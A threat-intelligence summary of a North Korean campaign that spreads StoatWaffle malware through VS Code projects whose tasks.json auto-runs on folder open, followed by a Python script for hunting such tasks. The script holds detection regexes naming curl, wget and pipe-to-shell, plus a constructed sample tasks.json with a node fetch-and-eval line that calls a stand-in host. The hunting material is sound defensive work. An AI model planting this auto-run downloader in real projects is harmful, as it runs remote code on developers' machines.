North Korean threat actor WaterPlum (aka Contagious Interview) is distributing the Node.js StoatWaffle malware through malicious Visual Studio Code projects whose tasks.json auto-runs a task on folder open to fetch and execute payloads. The campaign delivers a browser credential stealer and a RAT, abuses npm packages and compromised GitHub repositories, targets developers and crypto professionals via fake interviews and LinkedIn lures, and prompted Microsoft mitigations in VS Code 1.109/1.110. #StoatWaffle #ContagiousInterview
Keypoints
- WaterPlum (Contagious Interview) distributes StoatWaffle via malicious VS Code projects whose .vscode/tasks.json defines a task with runOptions.runOn set to folderOpen, so it runs as soon as the folder is opened.
- The malware installs Node.js if absent and runs a staged downloader chain that executes Node.js code from external servers.
- StoatWaffle includes a stealer that exfiltrates browser credentials (and iCloud Keychain on macOS) and a RAT that executes commands and transfers files.
- The threat actor also leverages malicious npm packages, obfuscated GitHub payloads, compromised contributor accounts, and social-engineered fake interviews to target developers and crypto personnel.
- Microsoft responded in VS Code 1.109/1.110 by tightening the task.allowAutomaticTasks setting and adding extra prompts before automatic tasks run, and U.S. authorities have prosecuted individuals tied to North Korea's IT worker scheme.
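A practical way to hunt for the initial-access trick described in the keypoints above is to scan checked-out repositories for a .vscode/tasks.json that auto-runs on folder open and flag command lines that look like a staged downloader. The script below is an added example written for this page, not code from the article, from Microsoft, or from the threat actor; the indicator patterns and the embedded sample tasks.json are constructed for illustration and are not IOCs from the campaign. It parses tasks.json as JSON-with-comments (which VS Code permits) with a small tokenizer rather than a regex, because a naive comment stripper would truncate the `//` inside a URL string, which is exactly where the payload address lives.

```python
"""Hunt for VS Code tasks.json files that auto-run on folder open.

Added example (not from the article or any vendor tool). Parses each
.vscode/tasks.json (JSON with comments, as VS Code allows), reports tasks
whose runOptions.runOn is "folderOpen", and tags the command line with
constructed indicator names typical of download-and-execute stages.
"""
import json
import os
import re
import sys
from typing import Iterator

# Constructed heuristics, not IOCs from the article; tune for your environment.
SUSPICIOUS = [
    ("inline-node-eval", re.compile(r"\bnode\b.*\s-e\b", re.I)),
    ("download-tool", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)),
    ("pipe-to-interpreter", re.compile(r"\|\s*(sh|bash|node|python[23]?)\b", re.I)),
    ("encoded-powershell", re.compile(r"\bpowershell\b.*\s-(enc|e|ec)\b", re.I)),
    ("script-eval", re.compile(r"\beval\s*\(", re.I)),
    ("remote-url", re.compile(r"https?://", re.I)),
]


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas, but only outside strings."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:        # keep escaped char verbatim
                out.append(text[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True; out.append(c); i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i); i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j < 0 else j + 2
        elif c == ",":
            j = i + 1
            while j < n and text[j].isspace():
                j += 1
            if j < n and text[j] in "}]":      # trailing comma: drop it
                i += 1
            else:
                out.append(c); i += 1
        else:
            out.append(c); i += 1
    return "".join(out)


def task_command_line(task: dict) -> str:
    """Flatten command + args (string or {value: ...} form) into one line."""
    parts = [str(task.get("command", ""))]
    for a in task.get("args", []) or []:
        parts.append(a if isinstance(a, str) else str(a.get("value", a)))
    return " ".join(parts)


def audit_tasks_json(text: str) -> list[dict]:
    """Return every folderOpen task with the indicator names its command matched."""
    doc = json.loads(strip_jsonc(text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command_line(task)
        hits = [name for name, pat in SUSPICIOUS if pat.search(cmd)]
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": cmd, "indicators": hits})
    return findings


def scan_tree(root: str) -> Iterator[tuple[str, list[dict]]]:
    """Yield (path, findings) for each .vscode/tasks.json under root."""
    for dirpath, dirnames, filenames in os.walk(root):
        if "node_modules" in dirnames:
            dirnames.remove("node_modules")
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            try:
                with open(path, encoding="utf-8-sig") as f:
                    yield path, audit_tasks_json(f.read())
            except (OSError, ValueError) as e:   # JSONDecodeError is a ValueError
                yield path, [{"label": "<parse error>", "command": str(e), "indicators": []}]


# Constructed sample modelled on the auto-run pattern; example.invalid is a reserved name.
SAMPLE_TASKS_JSON = r'''{
  // build task plus a stage-0 downloader, both auto-run on folder open
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build",
      "runOptions": { "runOn": "folderOpen" }, },
    { "label": "setup", "type": "shell", "command": "node",
      "args": ["-e", "require('https').get('https://example.invalid/s.js', r => { let d=''; r.on('data', c => d += c); r.on('end', () => eval(d)); })"],
      "runOptions": { "runOn": "folderOpen" } /* fetch-and-eval stage */ }
  ]
}'''

if __name__ == "__main__":
    for path, findings in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        for f in findings:
            print(f"{path}: [{f['label']}] {f['indicators'] or 'review'} :: {f['command'][:120]}")
```

Every folderOpen task is reported, not only the ones with indicators, because the benign-looking "build" entry still deserves a look in a repository you just cloned from an interview lure. On the endpoint side, setting `"task.allowAutomaticTasks": "off"` in user settings prevents folderOpen tasks from running at all until you explicitly allow them.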
Read More: https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html